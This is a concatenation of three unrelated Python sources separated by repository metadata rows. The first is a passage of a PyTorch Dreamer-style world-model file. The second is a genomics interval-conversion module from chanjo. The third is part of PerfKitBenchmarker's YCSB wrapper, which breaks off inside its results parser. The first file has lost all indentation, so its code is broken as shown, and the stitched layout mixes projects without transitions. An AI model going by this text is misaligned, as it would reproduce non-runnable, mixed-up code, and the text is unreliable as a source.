# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # )
#
# beliefs = []
# posterior_means = []
# posterior_std_devs = []
# posterior_states = []
#
# beliefs.append(prev_belief)
# posterior_states.append(prev_state)
#
# # beliefs[0], prior_states[0], posterior_states[0] = prev_belief, prev_state, prev_state
# # for t in range(T - 1):
# for t in range(10):
# # Select appropriate previous state
# _state = posterior_states[-1]
# # Set _state to 0 if previous transition was terminal
# _state = _state * nonterminals[t]
#
# # Compute belief (deterministic hidden state)
# # This if f in the paper.
# # "beliefs" is h_t in the paper
# hidden = F.elu(self.fc_embed_state_action(torch.cat((_state, actions[t]), dim=1)))
# belief = self.rnn(hidden, beliefs[-1])
#
# # Compute state prior by applying transition dynamics.
# # This is the "stochastic state model" or "prior" in the paper
# # The prior has no info on the actual observation.
# # TODO: pull this out of the loop and batch it all at the end
# # hidden = F.elu(self.fc_embed_belief_prior(beliefs[t + 1]))
# # prior_means[t + 1], _prior_std_dev = torch.chunk(self.fc_state_prior(hidden), 2, dim=1)
# # prior_std_devs[t + 1] = F.softplus(_prior_std_dev) + self.min_std_dev
# # prior_states[t + 1] = prior_means[t + 1] + prior_std_devs[t + 1] * torch.randn_like(prior_means[t + 1])
#
# # Compute state posterior by applying transition dynamics and using current observation
# # This is the "encoder" or "posterior" in the paper
# # The posterior differs from the prior in that it also sees the observation.
# # Use t_ to deal with different time indexing for observations
# t_ = t - 1
# hidden = F.elu(
# self.fc_embed_belief_posterior(torch.cat([belief, enc_observations[t_ + 1]], dim=1))
# )
# posterior_mean, _posterior_std_dev = torch.chunk(self.fc_state_posterior(hidden), 2, dim=1)
# posterior_std_dev = F.softplus(_posterior_std_dev) + self.min_std_dev
# posterior_state = posterior_mean + posterior_std_dev #* torch.randn_like(posterior_mean)
#
# posterior_states.append(posterior_state)
# posterior_means.append(posterior_mean)
# posterior_std_devs.append(posterior_std_dev)
# beliefs.append(belief)
#
# # Return new hidden states
# return (
# torch.stack(beliefs[1:], dim=0),
# # torch.stack(prior_states[1:], dim=0),
# # torch.stack(prior_means[1:], dim=0),
# # torch.stack(prior_std_devs[1:], dim=0),
# torch.stack(posterior_states[1:], dim=0),
# torch.stack(posterior_means[1:], dim=0),
# torch.stack(posterior_std_devs[1:], dim=0),
# )
def forward(
self,
prev_state: torch.Tensor,
actions: torch.Tensor,
prev_belief: torch.Tensor,
enc_observations: Optional[torch.Tensor] = None,
nonterminals: Optional[torch.Tensor] = None,
) -> List[torch.Tensor]:
"""
Computes transitions for an entire sequence.
If enc_observations is given, "training mode" is used where the state posterior is the base of the next
timestep. Else, in "test mode", the prior is rolled out.
Input: init_belief, init_state: torch.Size([50, 200]) torch.Size([50, 30])
Output: beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs
torch.Size([49, 50, 200]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30])
"""
# Create lists for hidden states (cannot use single tensor as buffer because autograd won't work with inplace writes)
T = actions.size(0) + 1
beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs = (
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
)
beliefs[0], prior_states[0], posterior_states[0] = prev_belief, prev_state, prev_state
for t in range(T - 1):
# Select appropriate previous state
_state = prior_states[t] if enc_observations is None else posterior_states[t]
# Set _state to 0 if previous transition was terminal
_state = _state if nonterminals is None else _state * nonterminals[t]
# Compute belief (deterministic hidden state)
# This if f in the paper.
# "beliefs" is h_t in the paper
hidden = F.elu(self.fc_embed_state_action(torch.cat([_state, actions[t]], dim=1)))
beliefs[t + 1] = self.rnn(hidden, beliefs[t])
# Compute state prior by applying transition dynamics.
# This is the "stochastic state model" or "prior" in the paper
# The prior has no info on the actual observation.
hidden = F.elu(self.fc_embed_belief_prior(beliefs[t + 1]))
prior_means[t + 1], _prior_std_dev = torch.chunk(self.fc_state_prior(hidden), 2, dim=1)
prior_std_devs[t + 1] = F.softplus(_prior_std_dev) + self.min_std_dev
prior_states[t + 1] = prior_means[t + 1] + prior_std_devs[t + 1] * torch.randn_like(prior_means[t + 1])
if enc_observations is not None:
# Compute state posterior by applying transition dynamics and using current observation
# This is the "encoder" or "posterior" in the paper
# The posterior differs from the prior in that it also sees the observation.
# Use t_ to deal with different time indexing for observations
t_ = t - 1
hidden = F.elu(
self.fc_embed_belief_posterior(torch.cat([beliefs[t + 1], enc_observations[t_ + 1]], dim=1))
)
posterior_means[t + 1], _posterior_std_dev = torch.chunk(self.fc_state_posterior(hidden), 2, dim=1)
posterior_std_devs[t + 1] = F.softplus(_posterior_std_dev) + self.min_std_dev
posterior_states[t + 1] = posterior_means[t + 1] + posterior_std_devs[t + 1] * torch.randn_like(
posterior_means[t + 1]
)
# Return new hidden states
hidden = [
torch.stack(beliefs[1:], dim=0),
torch.stack(prior_states[1:], dim=0),
torch.stack(prior_means[1:], dim=0),
torch.stack(prior_std_devs[1:], dim=0),
]
if enc_observations is not None:
hidden += [
torch.stack(posterior_states[1:], dim=0),
torch.stack(posterior_means[1:], dim=0),
torch.stack(posterior_std_devs[1:], dim=0),
]
return hidden
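    # Hedged shape example (not in the original file): rolling out priors only ("test
    # mode", no encoded observations), assuming belief_size=200, state_size=30,
    # action_size=6, hidden_size=200, embedding_size=1024 and a batch of 50:
    #   tm = TransitionModel(200, 30, 6, 200, 1024)
    #   beliefs, prior_states, prior_means, prior_stds = tm(
    #       torch.zeros(50, 30), torch.zeros(10, 50, 6), torch.zeros(50, 200))
    #   beliefs.shape  # -> torch.Size([10, 50, 200])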
class SymbolicObservationModel(jit.ScriptModule):
def __init__(self, observation_size, belief_size, state_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, embedding_size)
self.fc2 = nn.Linear(embedding_size, embedding_size)
self.fc3 = nn.Linear(embedding_size, observation_size)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, belief, state):
hidden = self.act_fn(self.fc1(torch.cat([belief, state], dim=1)))
hidden = self.act_fn(self.fc2(hidden))
observation = self.fc3(hidden)
return observation
class VisualObservationModel(jit.ScriptModule):
__constants__ = ["embedding_size"]
def __init__(self, belief_size, state_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.embedding_size = embedding_size
self.fc1 = nn.Linear(belief_size + state_size, embedding_size)
self.conv1 = nn.ConvTranspose2d(embedding_size, 128, 5, stride=2)
self.conv2 = nn.ConvTranspose2d(128, 64, 5, stride=2)
self.conv3 = nn.ConvTranspose2d(64, 32, 6, stride=2)
self.conv4 = nn.ConvTranspose2d(32, 3, 6, stride=2)
self.modules = [self.fc1, self.conv1, self.conv2, self.conv3, self.conv4]
@jit.script_method
def forward(self, belief, state):
# No nonlinearity here
hidden = self.fc1(torch.cat([belief, state], dim=1))
hidden = hidden.view(-1, self.embedding_size, 1, 1)
hidden = self.act_fn(self.conv1(hidden))
hidden = self.act_fn(self.conv2(hidden))
hidden = self.act_fn(self.conv3(hidden))
observation = self.conv4(hidden)
return observation
def ObservationModel(symbolic, observation_size, belief_size, state_size, embedding_size, activation_function="relu"):
if symbolic:
return SymbolicObservationModel(observation_size, belief_size, state_size, embedding_size, activation_function)
else:
return VisualObservationModel(belief_size, state_size, embedding_size, activation_function)
class RewardModel(jit.ScriptModule):
def __init__(self, belief_size, state_size, hidden_size, activation_function="relu"):
# [--belief-size: 200, --hidden-size: 200, --state-size: 30]
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, 1)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, belief, state):
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
reward = self.fc3(hidden).squeeze(dim=1)
return reward
class ValueModel(jit.ScriptModule):
def __init__(self, belief_size, state_size, hidden_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, hidden_size)
self.fc4 = nn.Linear(hidden_size, 1)
self.modules = [self.fc1, self.fc2, self.fc3, self.fc4]
@jit.script_method
def forward(self, belief, state):
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.act_fn(self.fc3(hidden))
reward = self.fc4(hidden).squeeze(dim=1)
return reward
class ActorModel(jit.ScriptModule):
def __init__(
self,
belief_size,
state_size,
hidden_size,
action_size,
dist="tanh_normal",
activation_function="elu",
min_std=1e-4,
init_std=5,
mean_scale=5,
):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, hidden_size)
self.fc4 = nn.Linear(hidden_size, hidden_size)
self.fc5 = nn.Linear(hidden_size, 2 * action_size)
self.modules = [self.fc1, self.fc2, self.fc3, self.fc4, self.fc5]
        self._dist = dist
        self._min_std = min_std
        self._init_std = init_std
        self._mean_scale = mean_scale
        # Precompute the inverse softplus of init_std as a plain float so that
        # forward() does not call torch.exp on a Python scalar.
        self._raw_init_std = float(np.log(np.exp(init_std) - 1))
@jit.script_method
def forward(self, belief, state):
        raw_init_std = self._raw_init_std
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.act_fn(self.fc3(hidden))
hidden = self.act_fn(self.fc4(hidden))
action = self.fc5(hidden).squeeze(dim=1)
action_mean, action_std_dev = torch.chunk(action, 2, dim=1)
# TODO: why tanh here? are the valid actions in (-1, 1)? probably
action_mean = self._mean_scale * torch.tanh(action_mean / self._mean_scale)
action_std = F.softplus(action_std_dev + raw_init_std) + self._min_std
return action_mean, action_std
def get_action(self, belief, state, det=False):
action_mean, action_std = self.forward(belief, state)
# TODO: understand+simplify this
dist = Normal(action_mean, action_std)
dist = TransformedDistribution(dist, TanhBijector())
dist = torch.distributions.Independent(dist, 1)
dist = SampleDist(dist)
if det:
return dist.mode()
else:
return dist.rsample()
class SymbolicEncoder(jit.ScriptModule):
def __init__(self, observation_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(observation_size, embedding_size)
self.fc2 = nn.Linear(embedding_size, embedding_size)
self.fc3 = nn.Linear(embedding_size, embedding_size)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, observation):
hidden = self.act_fn(self.fc1(observation))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.fc3(hidden)
return hidden
# TODO: isn't the encoder supposed to have a sampling step?
class VisualEncoder(jit.ScriptModule):
__constants__ = ["embedding_size"]
def __init__(self, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.embedding_size = embedding_size
self.conv1 = nn.Conv2d(3, 32, 4, stride=2)
self.conv2 = nn.Conv2d(32, 64, 4, stride=2)
self.conv3 = nn.Conv2d(64, 128, 4, stride=2)
self.conv4 = nn.Conv2d(128, 256, 4, stride=2)
# TODO: huh
self.fc = nn.Identity() if embedding_size == 1024 else nn.Linear(1024, embedding_size)
self.modules = [self.conv1, self.conv2, self.conv3, self.conv4]
@jit.script_method
def forward(self, observation):
hidden = self.act_fn(self.conv1(observation))
hidden = self.act_fn(self.conv2(hidden))
hidden = self.act_fn(self.conv3(hidden))
hidden = self.act_fn(self.conv4(hidden))
hidden = hidden.view(-1, 1024)
hidden = self.fc(hidden) # Identity if embedding size is 1024 else linear projection
return hidden
def Encoder(symbolic, observation_size, embedding_size, activation_function="relu"):
if symbolic:
return SymbolicEncoder(observation_size, embedding_size, activation_function)
else:
return VisualEncoder(embedding_size, activation_function)
# "atanh", "TanhBijector" and "SampleDist" are from the following repo
# https://github.com/juliusfrost/dreamer-pytorch
def atanh(x):
return 0.5 * torch.log((1 + x) / (1 - x))
class TanhBijector(torch.distributions.Transform):
def __init__(self):
super().__init__()
self.bijective = True
self.domain = torch.distributions.constraints.real
self.codomain = torch.distributions.constraints.interval(-1.0, 1.0)
@property
def sign(self):
return 1.0
def _call(self, x):
return torch.tanh(x)
def _inverse(self, y: torch.Tensor):
y = torch.where((torch.abs(y) <= 1.0), torch.clamp(y, -0.99999997, 0.99999997), y)
y = atanh(y)
return y
def log_abs_det_jacobian(self, x, y):
return 2.0 * (np.log(2) - x - F.softplus(-2.0 * x))
class SampleDist:
def __init__(self, dist, samples=100):
self._dist = dist
self._samples = samples
@property
def name(self):
return "SampleDist"
def __getattr__(self, name):
return getattr(self._dist, name)
    def mean(self):
        dist = self._dist.expand((self._samples, *self._dist.batch_shape))
        sample = dist.rsample()
        return torch.mean(sample, 0)
def mode(self):
dist = self._dist.expand((self._samples, *self._dist.batch_shape))
sample = dist.rsample()
logprob = dist.log_prob(sample)
batch_size = sample.size(1)
feature_size = sample.size(2)
indices = torch.argmax(logprob, dim=0).reshape(1, batch_size, 1).expand(1, batch_size, feature_size)
return torch.gather(sample, 0, indices).squeeze(0)
def entropy(self):
dist = self._dist.expand((self._samples, *self._dist.batch_shape))
sample = dist.rsample()
logprob = dist.log_prob(sample)
return -torch.mean(logprob, 0)
def sample(self):
return self._dist.sample()
| 42.597959
| 193
| 0.621904
|
e09ec15d26c708a9cc3d72354e0fd70a756d4349
| 3,922
|
py
|
Python
|
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | null | null | null |
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | null | null | null |
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | 1
|
2018-07-18T14:56:09.000Z
|
2018-07-18T14:56:09.000Z
|
# -*- coding: utf-8 -*-
"""
chanjo.converter.stages
~~~~~~~~~~~~~~~~~~~~~~~~
Pipeline stages only used by the Chanjo converter.
"""
from __future__ import absolute_import
from operator import attrgetter
from toolz import curry, mapcat
from ..utils import BaseInterval
@curry
def grep(pattern, string):
"""Match a simple pattern substring in a given string.
Note that the function would also work to check for an item in a list,
a key in a dictionary etc.
Args:
pattern (str): substring to match with
string (str): string to match against
Returns:
bool: if ``pattern`` was a substring in ``string``
"""
return pattern in string
def parse_raw_intervals(str_list):
"""Decode serialized CCDS exons.
Accepts a formatted string of interval coordinates from the CCDS
row and turns it into a more manageable list of lists with
(start, end) coordinates for each interval (exon).
.. code-block:: python
>>> parse_raw_intervals('[11-18, 25-30, 32-35]')
[[11, 18], [25, 30], [32, 35]]
Args:
str_list (str): A CSV string of (start, end) pairs, wrapped in '[]'
Returns:
list: 2D list with the start ``int``, end ``int`` pairs
"""
# remove the "[]"
csv_intervals = str_list[1:-1].replace(' ', '')
# 1. split first into exons coordinates
# 2. split into start, end and parse int
intervals = [[int(pos) for pos in item.split('-')]
for item in csv_intervals.split(',')]
return intervals
def extract_intervals(record):
"""Compile an BaseInterval from a single (split) CCDS record row.
Args:
record (tuple): split CCDS row
Yields:
BaseInterval: namedtuple class representation of an interval
"""
# extract contig Id as string
contig = record[0]
# parse the intervals list-string and yield each of the intervals
for start, end in parse_raw_intervals(record[9]):
yield BaseInterval(
contig, # contig
start, # start
end, # end
"%s-%d-%d" % (contig, start, end), # unique id
0, # score, unused but required
record[6], # strand
[record[4]], # block ids
[record[2]] # superblock ids
)
def rename_sex_interval(interval, sex_contigs=('X', 'Y')):
"""Rename interval ids for intervals on sex chromosomes.
    Non-sex intervals are returned unchanged. The need for this step is that
    20 superblocks are present on both sex chromosomes (X and Y). However,
    the corresponding intervals should still be treated as if they weren't
    really homologous.
Args:
interval (tuple): tuple representation of an interval
Returns:
BaseInterval: namedtuple representation of an interval
"""
contig = interval.contig
if contig in sex_contigs:
        # keep the function pure, avoid altering the input object!
return interval._replace(
block_ids=["%s-%s" % (contig, block_id)
for block_id in interval.block_ids],
superblock_ids=["%s-%s" % (contig, superblock_id)
for superblock_id in interval.superblock_ids]
)
else:
return interval
def merge_related_elements(interval_group):
"""Merge block and superblock ids for a group of identical intervals.
Args:
interval_group (list): list of identical intervals
Returns:
BaseInterval: unified interval with merged related element ids
"""
# extract block and superblock ids from each of the intervals
block_ids = mapcat(attrgetter('block_ids'), interval_group)
superblock_ids = mapcat(attrgetter('superblock_ids'), interval_group)
return BaseInterval(
*interval_group[0][:6], # use first interval as base
block_ids=list(block_ids), # resolve and add
        superblock_ids=list(superblock_ids)  # ditto: resolve and add
)
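if __name__ == '__main__':
    # Illustrative sketch, not part of chanjo: merge two copies of the same
    # exon interval that originate from different transcripts (blocks). The
    # BaseInterval fields below simply mirror the eight positional values
    # used in extract_intervals() above.
    interval_a = BaseInterval('X', 11, 18, 'X-11-18', 0, '+', ['tx1'], ['gene1'])
    interval_b = BaseInterval('X', 11, 18, 'X-11-18', 0, '+', ['tx2'], ['gene1'])
    merged = merge_related_elements([interval_a, interval_b])
    print(merged.block_ids)       # ['tx1', 'tx2']
    print(merged.superblock_ids)  # ['gene1', 'gene1']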
| 28.838235
| 72
| 0.642784
|
d454e7eaa77072fbe095e6672c3b95619dd22c66
| 45,082
|
py
|
Python
|
perfkitbenchmarker/linux_packages/ycsb.py
|
dPhanekham/PerfKitBenchmarker
|
e9fe13fb826ef875d3100c164a50dac638b756c3
|
[
"Apache-2.0"
] | null | null | null |
perfkitbenchmarker/linux_packages/ycsb.py
|
dPhanekham/PerfKitBenchmarker
|
e9fe13fb826ef875d3100c164a50dac638b756c3
|
[
"Apache-2.0"
] | 1
|
2021-03-26T00:41:05.000Z
|
2021-03-26T00:41:05.000Z
|
perfkitbenchmarker/linux_packages/ycsb.py
|
sachinpatkar/PerfKitBenchmarker
|
ed2898278244d71501de87bb181d50b3561dcf44
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Install, execute, and parse results from YCSB.
YCSB (the Yahoo! Cloud Serving Benchmark) is a common method of comparing NoSQL
database performance.
https://github.com/brianfrankcooper/YCSB
For PerfKitBenchmarker, we wrap YCSB to:
* Pre-load a database with a fixed number of records.
* Execute a collection of workloads under a staircase load.
* Parse the results into PerfKitBenchmarker samples.
The 'YCSBExecutor' class handles executing YCSB on a collection of client VMs.
Generally, clients just need this class. For example, to run against
HBase 1.0:
>>> executor = ycsb.YCSBExecutor('hbase-10')
>>> samples = executor.LoadAndRun(loader_vms)
By default, this runs YCSB workloads A and B against the database, 32 threads
per client VM, with an initial database size of 1GB (1k records).
Each workload runs for at most 30 minutes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import bisect
import collections
import copy
import csv
import itertools
import json
import logging
import math
import operator
import os
import posixpath
import re
import time
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import events
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import INSTALL_DIR
import six
from six.moves import filter
from six.moves import range
from six.moves import zip
FLAGS = flags.FLAGS
YCSB_DIR = posixpath.join(INSTALL_DIR, 'ycsb')
YCSB_EXE = posixpath.join(YCSB_DIR, 'bin', 'ycsb')
HDRHISTOGRAM_DIR = posixpath.join(INSTALL_DIR, 'hdrhistogram')
HDRHISTOGRAM_TAR_URL = ('https://github.com/HdrHistogram/HdrHistogram/archive/'
'HdrHistogram-2.1.10.tar.gz')
HDRHISTOGRAM_GROUPS = ['READ', 'UPDATE']
_DEFAULT_PERCENTILES = 50, 75, 90, 95, 99, 99.9
HISTOGRAM = 'histogram'
HDRHISTOGRAM = 'hdrhistogram'
TIMESERIES = 'timeseries'
YCSB_MEASUREMENT_TYPES = [HISTOGRAM, HDRHISTOGRAM, TIMESERIES]
# Binary operators to aggregate reported statistics.
# Statistics with operator 'None' will be dropped.
AGGREGATE_OPERATORS = {
'Operations': operator.add,
'RunTime(ms)': max,
'Return=0': operator.add,
'Return=-1': operator.add,
'Return=-2': operator.add,
'Return=-3': operator.add,
'Return=OK': operator.add,
'Return=ERROR': operator.add,
'LatencyVariance(ms)': None,
'AverageLatency(ms)': None, # Requires both average and # of ops.
'Throughput(ops/sec)': operator.add,
'95thPercentileLatency(ms)': None, # Calculated across clients.
'99thPercentileLatency(ms)': None, # Calculated across clients.
'MinLatency(ms)': min,
'MaxLatency(ms)': max}
flags.DEFINE_string('ycsb_version', '0.9.0', 'YCSB version to use. Defaults to '
'version 0.9.0.')
flags.DEFINE_enum('ycsb_measurement_type', HISTOGRAM,
YCSB_MEASUREMENT_TYPES,
'Measurement type to use for ycsb. Defaults to histogram.')
flags.DEFINE_enum('ycsb_measurement_interval', 'op',
['op', 'intended', 'both'],
'Measurement interval to use for ycsb. Defaults to op.')
flags.DEFINE_boolean('ycsb_histogram', False, 'Include individual '
'histogram results from YCSB (will increase sample '
'count).')
flags.DEFINE_boolean('ycsb_load_samples', True, 'Include samples '
'from pre-populating database.')
flags.DEFINE_boolean('ycsb_include_individual_results', False,
'Include results from each client VM, rather than just '
'combined results.')
flags.DEFINE_boolean('ycsb_reload_database', True,
                     'Reload the database, otherwise skip the load stage. '
                     'Note: this flag is only used if the database '
                     'is already loaded.')
flags.DEFINE_integer('ycsb_client_vms', 1, 'Number of YCSB client VMs.')
flags.DEFINE_list('ycsb_workload_files', ['workloada', 'workloadb'],
'Path to YCSB workload file to use during *run* '
'stage only. Comma-separated list')
flags.DEFINE_list('ycsb_load_parameters', [],
'Passed to YCSB during the load stage. Comma-separated list '
'of "key=value" pairs.')
flags.DEFINE_list('ycsb_run_parameters', [],
                  'Passed to YCSB during the run stage. Comma-separated list '
                  'of "key=value" pairs.')
flags.DEFINE_list('ycsb_threads_per_client', ['32'], 'Number of threads per '
'loader during the benchmark run. Specify a list to vary the '
'number of clients.')
flags.DEFINE_integer('ycsb_preload_threads', None, 'Number of threads per '
'loader during the initial data population stage. '
'Default value depends on the target DB.')
flags.DEFINE_integer('ycsb_record_count', None, 'Pre-load the database with '
                     'this total number of records. Overrides the recordcount '
                     'value in all workloads of this run. Defaults to None, in '
                     'which case the recordcount value in each workload is '
                     'used. If neither is set, the ycsb default of 0 is used.')
flags.DEFINE_integer('ycsb_operation_count', None, 'Number of operations '
'*per client VM*.')
flags.DEFINE_integer('ycsb_timelimit', 1800, 'Maximum amount of time to run '
'each workload / client count combination. Set to 0 for '
'unlimited time.')
flags.DEFINE_integer('ycsb_field_count', None, 'Number of fields in a record. '
'Defaults to None which uses the ycsb default of 10.')
flags.DEFINE_integer('ycsb_field_length', None, 'Size of each field. Defaults '
'to None which uses the ycsb default of 100.')
flags.DEFINE_enum('ycsb_requestdistribution',
                  None, ['uniform', 'zipfian', 'latest'],
                  'Type of request distribution. '
                  'This will override the workload file parameter.')
flags.DEFINE_float('ycsb_readproportion',
                   None,
                   'The read proportion. '
                   'Default is 0.5 in workloada and 0.95 in YCSB.')
flags.DEFINE_float('ycsb_updateproportion',
                   None,
                   'The update proportion. '
                   'Default is 0.5 in workloada and 0.05 in YCSB.')
flags.DEFINE_float('ycsb_scanproportion',
                   None,
                   'The scan proportion. '
                   'Default is 0 in workloada and 0 in YCSB.')
# Default loading thread count for non-batching backends.
DEFAULT_PRELOAD_THREADS = 32
def _GetVersionIndex(version_str):
"""Returns the version index from ycsb version string.
Args:
version_str: ycsb version string with format '0.<version index>.0'.
Returns:
(int) version index.
"""
return int(version_str.split('.')[1])
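# For example, _GetVersionIndex('0.12.0') returns 12; the version gates below
# (hdrhistogram support, the HdrHistogram build step) compare this index.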
def _GetThreadsPerLoaderList():
"""Returns the list of client counts per VM to use in staircase load."""
return [int(thread_count) for thread_count in FLAGS.ycsb_threads_per_client]
def _GetWorkloadFileList():
"""Returns the list of workload files to run.
Returns:
In order of preference:
* The argument to --ycsb_workload_files.
* Bundled YCSB workloads A and B.
"""
return [data.ResourcePath(workload)
for workload in FLAGS.ycsb_workload_files]
def CheckPrerequisites():
for workload_file in _GetWorkloadFileList():
if not os.path.exists(workload_file):
raise IOError('Missing workload file: {0}'.format(workload_file))
if FLAGS.ycsb_measurement_type == HDRHISTOGRAM:
if _GetVersionIndex(FLAGS.ycsb_version) < 11:
raise errors.Config.InvalidValue('hdrhistogram not supported on earlier '
'ycsb versions.')
def _Install(vm):
"""Installs the YCSB and, if needed, hdrhistogram package on the VM."""
vm.Install('openjdk')
vm.Install('curl')
ycsb_url = ('https://github.com/brianfrankcooper/YCSB/releases/'
'download/{0}/ycsb-{0}.tar.gz').format(FLAGS.ycsb_version)
install_cmd = ('mkdir -p {0} && curl -L {1} | '
'tar -C {0} --strip-components=1 -xzf -')
vm.RemoteCommand(install_cmd.format(YCSB_DIR, ycsb_url))
if _GetVersionIndex(FLAGS.ycsb_version) >= 11:
vm.RemoteCommand(install_cmd.format(HDRHISTOGRAM_DIR, HDRHISTOGRAM_TAR_URL))
vm.RemoteCommand('sudo apt-get --assume-yes install maven > /dev/null 2>&1')
# _JAVA_OPTIONS needed to work around this issue:
# https://stackoverflow.com/questions/53010200/maven-surefire-could-not-find-forkedbooter-class
vm.RemoteCommand('cd {0}; _JAVA_OPTIONS=-Djdk.net.URLClassPath.'
'disableClassPathURLCheck=true '
'mvn install > /dev/null 2>&1'.format(
HDRHISTOGRAM_DIR))
def YumInstall(vm):
"""Installs the YCSB package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the YCSB package on the VM."""
_Install(vm)
def ParseResults(ycsb_result_string, data_type='histogram'):
"""Parse YCSB results.
Example input for histogram datatype:
YCSB Client 0.1
Command line: -db com.yahoo.ycsb.db.HBaseClient -P /tmp/pkb/workloada
[OVERALL], RunTime(ms), 1800413.0
[OVERALL], Throughput(ops/sec), 2740.503428935472
[UPDATE], Operations, 2468054
[UPDATE], AverageLatency(us), 2218.8513395574005
[UPDATE], MinLatency(us), 554
[UPDATE], MaxLatency(us), 352634
[UPDATE], 95thPercentileLatency(ms), 4
[UPDATE], 99thPercentileLatency(ms), 7
[UPDATE], Return=0, 2468054
[UPDATE], 0, 398998
[UPDATE], 1, 1015682
[UPDATE], 2, 532078
...
Example input for hdrhistogram datatype:
YCSB Client 0.12.0
Command line: -db com.yahoo.ycsb.db.RedisClient -P /opt/pkb/workloadb
[OVERALL], RunTime(ms), 29770.0
[OVERALL], Throughput(ops/sec), 33590.86328518643
[UPDATE], Operations, 49856.0
[UPDATE], AverageLatency(us), 1478.0115532734276
[UPDATE], MinLatency(us), 312.0
[UPDATE], MaxLatency(us), 24623.0
[UPDATE], 95thPercentileLatency(us), 3501.0
[UPDATE], 99thPercentileLatency(us), 6747.0
[UPDATE], Return=OK, 49856
...
Example input for ycsb version after 0.13.0:
...
Command line: -db com.yahoo.ycsb.db.HBaseClient10 ... -load
YCSB Client 0.14.0
Loading workload...
Starting test.
...
[OVERALL], RunTime(ms), 11411
[OVERALL], Throughput(ops/sec), 8763.473841030585
[INSERT], Operations, 100000
[INSERT], AverageLatency(us), 74.92
[INSERT], MinLatency(us), 5
[INSERT], MaxLatency(us), 98495
[INSERT], 95thPercentileLatency(us), 42
[INSERT], 99thPercentileLatency(us), 1411
[INSERT], Return=OK, 100000
...
Example input for timeseries datatype:
...
[OVERALL], RunTime(ms), 240007.0
[OVERALL], Throughput(ops/sec), 10664.605615669543
...
[READ], Operations, 1279253
[READ], AverageLatency(us), 3002.7057071587874
[READ], MinLatency(us), 63
[READ], MaxLatency(us), 93584
[READ], Return=OK, 1279281
[READ], 0, 528.6142757498257
[READ], 500, 360.95347448674966
[READ], 1000, 667.7379547689283
[READ], 1500, 731.5389357265888
[READ], 2000, 778.7992281717318
...
Args:
ycsb_result_string: str. Text output from YCSB.
data_type: Either 'histogram' or 'timeseries' or 'hdrhistogram'.
      'histogram' and 'hdrhistogram' datasets are in the same format, the
      difference being that 'hdrhistogram' lacks the (millisec, count)
      histogram component, hence they are parsed similarly.
Returns:
A dictionary with keys:
client: containing YCSB version information.
command_line: Command line executed.
groups: list of operation group descriptions, each with schema:
group: group name (e.g., update, insert, overall)
statistics: dict mapping from statistic name to value
histogram: list of (ms_lower_bound, count) tuples, e.g.:
[(0, 530), (19, 1)]
indicates that 530 ops took between 0ms and 1ms, and 1 took between
19ms and 20ms. Empty bins are not reported.
Raises:
IOError: If the results contained unexpected lines.
"""
  # TODO: YCSB 0.9.0 outputs the client and command line strings to stderr, so
  # we need to support that in the future.
lines = []
client_string = 'YCSB'
command_line = 'unknown'
fp = six.StringIO(ycsb_result_string)
result_string = next(fp).strip()
def IsHeadOfResults(line):
return line.startswith('[OVERALL]')
while not IsHeadOfResults(result_string):
